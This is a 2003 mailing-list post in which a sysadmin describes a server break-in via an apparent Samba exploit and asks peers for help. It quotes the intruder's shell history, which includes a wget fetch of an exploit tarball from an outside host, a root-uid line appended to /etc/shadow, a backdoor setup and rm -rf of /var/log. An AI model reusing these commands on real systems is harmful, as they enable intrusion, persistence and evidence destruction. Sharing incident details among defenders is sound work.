Security Incidents mailing list archives
msamba
From: Steve Bromwich <incident () fop ns ca>
Date: Mon, 21 Apr 2003 12:41:27 -0300 (ADT)
Hi, Has anyone seen an msamba exploit? A client of mine was cracked last night using this. Whoever it was configured it to erase everything after a reboot (I got in in time to see a lot of rm -rf and killed the box). I've now reinstalled and restored the data, but I suspect the script kiddie is trying to get in again. He was nice enough to leave a .bash_history in /root: ps -aux w find // | grep *db find // | grep *.db find // | grep index.html cd /var/www ls -al cd tracking ls -al cd files ls -al cd /usr/share/sgml/docbook/stylesheet/dsssl/modular/images ls -al exit cd /usr/share/doc ls -al cd /var/www ls -al find // | grep *.log cd tracking ls -al cd files ls -al find // | grep index.* find // | grep shop.mdb find // | grep *.mdb exit cd /var locate order.log locate order.txt locate mdb locate metacart locate card cd www echo "qe3 wuzz here uid=0">about_us.html ps -aux cd /etc/init.d ls -al ./apache reload ps -aux cd /usr/etc ls -al / df cd /opt ls -al wget cahcepu.net/dhegleng/msamba.tar.gz pstree -p chmod 555 /tmp chmod 555 /var/tmp chmod 555 /var/vbox /usr/sbin/lsof |grep LISTEN /sbin/fuser -n tcp 23 w dir tar xzvf 73.tgz cd " " dir ls cd .. dir cd evil ./setup muie 55055 angelboy () the-darkside info w passwd daemon passwd daemon echo uid:x:0:0::/:/bin/bash >> /etc/shadow passwd $uid w locate .log rm -rf /var/log/ chmod 555 /tmp chmod 555 /var/tmp w pstree -p I picked up the copy of msamba and had a look at it; it looks like it's exploiting the recent samba bug for a wide variety of platforms (*BSD, SuSE, Slackware, Redhat, Mandrake, Gentoo and Debian). There's a tag in there that says "*** JE MOUET JE MUIL HOUWE - qe3" which I think might be Dutch (and I think, based on scans I'm seeing, the guy might be coming in from an IP registered to cyberangels.nl, but I don't have any hard proof). Mail is being sent to slamet_irdak () yahoo com once the exploit gets in, with output from uname -a and id being sent. The datestamp on the files are 18 April 08:43, which makes me think this might be close on a zero day exploit. I can't find anything about msamba googling around, either. The only other hint I had was the client mentioned there was "a lot of stuff about gzip running out of memory on the screen". Unfortunately I don't have the data from the drive to do any forensics on; as /var/log had been deleted it wasn't felt justified to go in deeper, and I just reformatted and reinstalled. Anyone else seen this? I'd like to make sure I've got everything tied down enough that this won't happen again. Samba wasn't supposed to be on there, and it's now been removed. I have a suspicion ssl might have been involved too, due to the gzip comment and the way apache was reloaded. Cheers, Steve ---------------------------------------------------------------------------- Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the world's premier event for IT and network security experts. The two-day Training features 6 hand-on courses on May 12-13 taught by professionals. The two-day Briefings on May 14-15 features 24 top speakers with no vendor sales pitches. Deadline for the best rates is April 25. Register today to ensure your place. http://www.securityfocus.com/BlackHat-incidents ----------------------------------------------------------------------------
Current thread:
- msamba Steve Bromwich (Apr 21)
- Re: msamba Paulo Abrantes (Apr 21)
- Re: msamba William Salusky (Apr 22)
- Re: msamba noconflic (Apr 22)
- Re: msamba Nikola Pepelishev (Apr 22)
- Re: msamba Steve Bromwich (Apr 22)
- Re: msamba noconflic (Apr 23)
- Re: msamba Tobias Klein (Apr 25)
- Re: msamba noconflic (Apr 23)